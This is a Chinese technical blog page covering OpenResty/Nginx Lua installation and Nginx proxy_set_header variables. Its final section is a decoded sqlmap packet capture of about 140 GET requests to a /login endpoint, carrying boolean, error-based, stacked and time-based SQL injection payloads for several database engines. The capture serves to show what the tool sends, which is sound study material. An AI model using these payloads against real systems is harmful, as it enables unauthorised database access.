kk Blog —— 通用基础


date [-d @int|str] [+%s|"+%F %T"]
netstat -ltunp
sar -n DEV 1

Nginx openresty 安装 Lua 支持

Nginx 支持 Lua 需要安装 lua-nginx-module 模块,一般常用有 2 种方法:

编译 Nginx 的时候带上 lua-nginx-module 模块一起编译

使用 OpenResty: Nginx + 一些模块,默认启用了 Lua 支持(推荐使用此方式)


OpenResty is just an enhanced version of Nginx by means of addon modules anyway. You can take advantage of all the exisitng goodies in the Nginx world.

OpenResty® 是一个基于 Nginx 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库、第三方模块以及大多数的依赖项。用于方便地搭建能够处理超高并发、扩展性极高的动态 Web 应用、Web 服务和动态网关。

OpenResty® 通过汇聚各种设计精良的 Nginx 模块(主要由 OpenResty 团队自主开发),从而将 Nginx 有效地变成一个强大的通用 Web 应用平台。这样,Web 开发人员和系统工程师可以使用 Lua 脚本语言调动 Nginx 支持的各种 C 以及 Lua 模块,快速构造出足以胜任 10K 乃至 1000K 以上单机并发连接的高性能 Web 应用系统。

OpenResty® 的目标是让你的Web服务直接跑在 Nginx 服务内部,充分利用 Nginx 的非阻塞 I/O 模型,不仅仅对 HTTP 客户端请求,甚至于对远程后端诸如 MySQL、PostgreSQL、Memcached 以及 Redis 等都进行一致的高性能响应。

OpenResty

OpenResty 的安装很方便,对于一些常见的 Linux 发行版本,OpenResty® 提供 官方预编译包,CentOS 使用 yum,Ubuntu 使用 apt-get,具体请参考 https://openresty.org/cn/installation.html%EF%BC%8C%E4%BB%A5%E4%B8%8B%E4%BB%A5CentOS 7 中安装 OpenResty 为例。

CentOS 7 使用 OpenResty

终端执行下面 3 条命令把 OpenResty 安装到 /usr/local/openresty

1
2
3
4
5
sudo yum install yum-utils

sudo yum-config-manager --add-repo https://openresty.org/package/centos/openresty.repo

sudo yum install openresty

Nginx 的配置文件位于 /usr/local/openresty/nginx/conf/nginx.conf (openresty -V 中没有指定)

验证

/usr/local/nginx/conf/nginx.conf 中添加 Lua 测试代码

1
2
3
4
location /lua {
	default_type 'text/html';
	content_by_lua 'ngx.say("hello world");';
}

启动 openresty

1
openresty

curl http://localhost/lua 输出 hello world 则说明 Nginx 支持 Lua

help

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[root@localhost ~]# openresty -h
nginx version: openresty/1.21.4.1
Usage: nginx [-?hvVtTq] [-s signal] [-p prefix]
             [-e filename] [-c filename] [-g directives]

Options:
  -?,-h         : this help
  -v            : show version and exit
  -V            : show version and configure options then exit
  -t            : test configuration and exit
  -T            : test configuration, dump it and exit
  -q            : suppress non-error messages during configuration testing
  -s signal     : send signal to a master process: stop, quit, reopen, reload
  -p prefix     : set prefix path (default: /usr/local/openresty/nginx/)
  -e filename   : set error log file (default: logs/error.log)
  -c filename   : set configuration file (default: conf/nginx.conf)
  -g directives : set global directives out of configuration file

编译 Nginx + Lua

编译 Nginx 需要先准备好下面的这些工具,如果不确定是否已安装,可以在编译的时候根据出现的错误提示再进行安装

1
2
yum install -y gcc g++ gcc-c++
yum -y install zlib zlib-devel openssl openssl--devel pcre pcre-devel

Nginx 支持 Lua 需要依赖 LuaJIT-2.0.4.tar.gz,ngx_devel_kit,lua-nginx-module,下面介绍具体的编译过程 (都下载到 /root 目录)

下载安装 LuaJIT-2.0.4.tar.gz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
wget -c http://luajit.org/download/LuaJIT-2.0.4.tar.gz
tar xzvf LuaJIT-2.0.4.tar.gz
cd LuaJIT-2.0.4
make install PREFIX=/usr/local/luajit

# 添加环境变量
export LUAJIT_LIB=/usr/local/luajit/lib
export LUAJIT_INC=/usr/local/luajit/include/luajit-2.0

下载解压 ngx_devel_kit

wget https://github.com/simpl/ngx_devel_kit/archive/v0.3.0.tar.gz
tar -xzvf v0.3.0.tar.gz

下载解压 lua-nginx-module
wget https://github.com/openresty/lua-nginx-module/archive/v0.10.8.tar.gz
tar -xzvf v0.10.8.tar.gz

下载安装 nginx-1.10.3.tar.gz

wget http://nginx.org/download/nginx-1.10.3.tar.gz
tar -xzvf nginx-1.10.3.tar.gz
cd nginx-1.10.3

# 注意ngx_devel_kit和lua-nginx-module 以实际解压路径为准
./configure --add-module=/root/ngx_devel_kit-0.3.0 --add-module=/root/lua-nginx-module-0.10.8

make -j2
make install

支持 Nginx 被安装到了 /usr/local/nginx,配置文件为 /usr/local/nginx/conf/nginx.conf

验证

将 nginx 做成命令: ln -s /usr/local/nginx/sbin/nginx /usr/bin/nginx

/usr/local/nginx/conf/nginx.conf 中添加 Lua 测试代码

1
2
3
4
location /lua {
	default_type 'text/html';
	content_by_lua 'ngx.say("hello world");';
}

启动 openresty

1
openresty

curl http://localhost/lua 输出 hello world 则说明 Nginx 支持 Lua

上面编译 Nginx 的内容来源于 http://www.cnblogs.com/aoeiuv/p/6856056.html%EF%BC%8C%E7%BC%96%E8%AF%91 Nginx 相对使用 OpenResty 麻烦一些,不过也不难,根据自己的喜好选择即可。

http://qtdebug.com/mac-nginx-lua/

nignx的proxy_set_header快速理解

https://www.cnblogs.com/eastegg/p/16650586.html

客户端地址(请求服务的地址):192.168.1.1

nignx服务器地址:192.168.1.2

后端服务器地址:192.168.1.3

proxy_set_header设置请求头,以便于后端服务器可以获取以上实际信息。

一、X-Real-IP

是指客户端的真实IP,如果设置了$remote_addr这个值,后端服务器就能获取到客户端的真实IP,也就是此例中的192.168.1.1

二、Host

proxy_set_header 可以设置 Host 为 $proxy_host、$host 与 $http_host。

host 的值设置为 $proxy_host,是指 nginx.conf 的 proxy_pass 中设置的host值,也就是192.168.1.3,也就是服务器的IP地址。

$http_host 不是一个固定的变量,他其实是 $http_HEADER 通配后的结果。

$http_HEADER,注意,这里的 HEADER 是一个通配符,通配的是请求头里的 header 属性,例如 $http_content_type 表示请求头里 content-type 属性的值,同理,$http_host 指的就是请求头里的host属性。

$host 是 core 模块内部的一个变量。

当请求头里不存在 Host 属性或者是个空值,$host 则等于 server_name

如果请求头里有Host属性,那么 $host 等于 Host 属性除了端口号的部分,例如 Host 属性是 www.example.com,那么$host就是 www.example.com

变量 是否显示端口 值是否存在
host "Host:value"显示
值为a:b的时候,只显示a
http_host "Host:value",value存在就显示
proxy_host 默认80不显示
其他端口显示
"Host:value"显示

参考:nginx $host$http_host 的区别 - UCloud云社区
https://zhuanlan.zhihu.com/p/115731015
Nginx中$http_host、$host、$proxy_host的区别 - hopeless-dream - 博客园 (cnblogs.com)

三、X-Forwarded-For

这个变量的值有 $proxy_add_x_forwarded_for 和 $remote_addr,在只有一个代理服务器的转发的情况下,两者的效果貌似差不多,都可以真实的显示出客户端原始ip。

举例说明,用户A的IP是192.168.1.1,请求一个经过两次nginx转发的应用,在第一台nginx中(192.168.1.2),配置如下:

1
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

现在 $proxy_add_x_forwarded_for 变量的"X-Forwarded-For"部分是空的,所以只有$remote_addr,而$remote_addr的值是用户的ip,那么X-Forwarded-For变量的值就是用户的ip:192.168.1.1。

到第二台nginx,配置如下:

1
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

现在的$proxy_add_x_forwarded_for变量,X-Forwarded-For部分包含的是用户的真实ip,$remote_addr部分的值是上一台nginx的ip地址,那么X-Forwarded-For的值就变成了"用户的真实ip,第一台nginx的ip",也就是“192.168.1.1, 192.168.1.2”

所以还是建议 X-Forwarded-For 的值设置成 $proxy_add_x_forwarded_for。

参考:https://cloud.tencent.com/developer/article/1899717

sqlmap抓包

用tcpdump抓包,wireshark导出text,urldecode解码,得到sqlmap的注入语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=2795&password=123 HTTP/1.1 
GET /login?username=abc((),",),.'&password=123 HTTP/1.1 
GET /login?username=abc'VOhiEk<'">ULNwju&password=123 HTTP/1.1 
GET /login?username=abc') AND 2781=9607 AND ('Rnuk'='Rnuk&password=123 HTTP/1.1 
GET /login?username=abc' AND 2247=4788 AND 'ddJs'='ddJs&password=123 HTTP/1.1 
GET /login?username=abc) AND 6875=6686 AND (3318=3318&password=123 HTTP/1.1 
GET /login?username=abc AND 3033=6740&password=123 HTTP/1.1 
GET /login?username=abc AND 9516=5869-- dooX&password=123 HTTP/1.1 
GET /login?username=(SELECT (CASE WHEN (2922=6853) THEN 'abc' ELSE (SELECT 6853 UNION SELECT 6863) END))&password=123 HTTP/1.1 
GET /login?username=abc') AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND ('WLxo'='WLxo&password=123 HTTP/1.1 
GET /login?username=abc' AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND 'EnIq'='EnIq&password=123 HTTP/1.1 
GET /login?username=abc) AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND (1539=1539&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))-- Zpqd&password=123 HTTP/1.1 
GET /login?username=abc') AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('yoJQ'='yoJQ&password=123 HTTP/1.1 
GET /login?username=abc' AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'rRrm'='rRrm&password=123 HTTP/1.1 
GET /login?username=abc) AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (9921=9921&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- MRHt&password=123 HTTP/1.1 
GET /login?username=abc') AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('uWsT'='uWsT&password=123 HTTP/1.1 
GET /login?username=abc' AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'autW'='autW&password=123 HTTP/1.1 
GET /login?username=abc) AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (6576=6576&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- bXtg&password=123 HTTP/1.1 
GET /login?username=abc') AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('VlYe'='VlYe&password=123 HTTP/1.1 
GET /login?username=abc' AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'XgIT'='XgIT&password=123 HTTP/1.1 
GET /login?username=abc) AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (6471=6471&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- IRUY&password=123 HTTP/1.1 
GET /login?username=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (6090=6090) THEN '1' ELSE '0' END)),'qzkjq'))&password=123 HTTP/1.1 
GET /login?username=abc');SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc');WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc';WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc);WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc;WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc') AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND ('BoHR'='BoHR&password=123 HTTP/1.1 
GET /login?username=abc' AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND 'IFHW'='IFHW&password=123 HTTP/1.1 
GET /login?username=abc) AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND (2757=2757&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)-- zwZm&password=123 HTTP/1.1 
GET /login?username=abc') AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND ('CuGS'='CuGS&password=123 HTTP/1.1 
GET /login?username=abc' AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND 'WmPH'='WmPH&password=123 HTTP/1.1 
GET /login?username=abc) AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND (6554=6554&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))-- OgwJ&password=123 HTTP/1.1 
GET /login?username=abc') WAITFOR DELAY '0:0:5' AND ('jCFc'='jCFc&password=123 HTTP/1.1 
GET /login?username=abc' WAITFOR DELAY '0:0:5' AND 'FpFX'='FpFX&password=123 HTTP/1.1 
GET /login?username=abc) WAITFOR DELAY '0:0:5' AND (7644=7644&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'-- sPYO&password=123 HTTP/1.1 
GET /login?username=abc') AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND ('BmJW'='BmJW&password=123 HTTP/1.1 
GET /login?username=abc' AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND 'svZV'='svZV&password=123 HTTP/1.1 
GET /login?username=abc) AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND (8259=8259&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)-- tkiR&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 1-- xBKA&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 2552-- QaqN&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 1-- CXec&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 5386-- OCdf&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 1-- qihI&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 8561-- muFp&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- zHug&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 6155-- jbRk&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- JNHc&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 7301-- lLsH&password=123 HTTP/1.1 
GET /login?username=abc&password=1760 HTTP/1.1 
GET /login?username=abc&password=123).),"')((. HTTP/1.1 
GET /login?username=abc&password=123'JHsedc<'">YLcugw HTTP/1.1 
GET /login?username=abc&password=123) AND 9079=5601 AND (1335=1335 HTTP/1.1 
GET /login?username=abc&password=123 AND 1857=7867 HTTP/1.1 
GET /login?username=abc&password=123 AND 8511=5177-- pZVc HTTP/1.1 
GET /login?username=abc&password=123') AND 7997=8676 AND ('HkRV'='HkRV HTTP/1.1 
GET /login?username=abc&password=123' AND 1648=3770 AND 'QrJb'='QrJb HTTP/1.1 
GET /login?username=abc&password=(SELECT (CASE WHEN (5600=9308) THEN 123 ELSE (SELECT 9308 UNION SELECT 4757) END)) HTTP/1.1 
GET /login?username=abc&password=123) AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND (8074=8074 HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71))-- mRSf HTTP/1.1 
GET /login?username=abc&password=123') AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND ('hMli'='hMli HTTP/1.1 
GET /login?username=abc&password=123' AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND 'PpkB'='PpkB HTTP/1.1 
GET /login?username=abc&password=123) AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (7589=7589 HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- AWtz HTTP/1.1 
GET /login?username=abc&password=123') AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('Kndh'='Kndh HTTP/1.1 
GET /login?username=abc&password=123' AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'ynpj'='ynpj HTTP/1.1 
GET /login?username=abc&password=123) AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (4254=4254 HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- Cppc HTTP/1.1 
GET /login?username=abc&password=123') AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('jrda'='jrda HTTP/1.1 
GET /login?username=abc&password=123' AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'Hxec'='Hxec HTTP/1.1 
GET /login?username=abc&password=123) AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (3323=3323 HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- ipPa HTTP/1.1 
GET /login?username=abc&password=123') AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('LKje'='LKje HTTP/1.1 
GET /login?username=abc&password=123' AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'qtMI'='qtMI HTTP/1.1 
GET /login?username=abc&password=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (8658=8658) THEN '1' ELSE '0' END)),'qzkjq')) HTTP/1.1 
GET /login?username=abc&password=123);SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123);WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123;WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123');WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123';WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123) AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND (5534=5534 HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG)-- wyKY HTTP/1.1 
GET /login?username=abc&password=123') AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND ('doQl'='doQl HTTP/1.1 
GET /login?username=abc&password=123' AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND 'IMvM'='IMvM HTTP/1.1 
GET /login?username=abc&password=123) AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND (8248=8248 HTTP/1.1 
GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) HTTP/1.1 
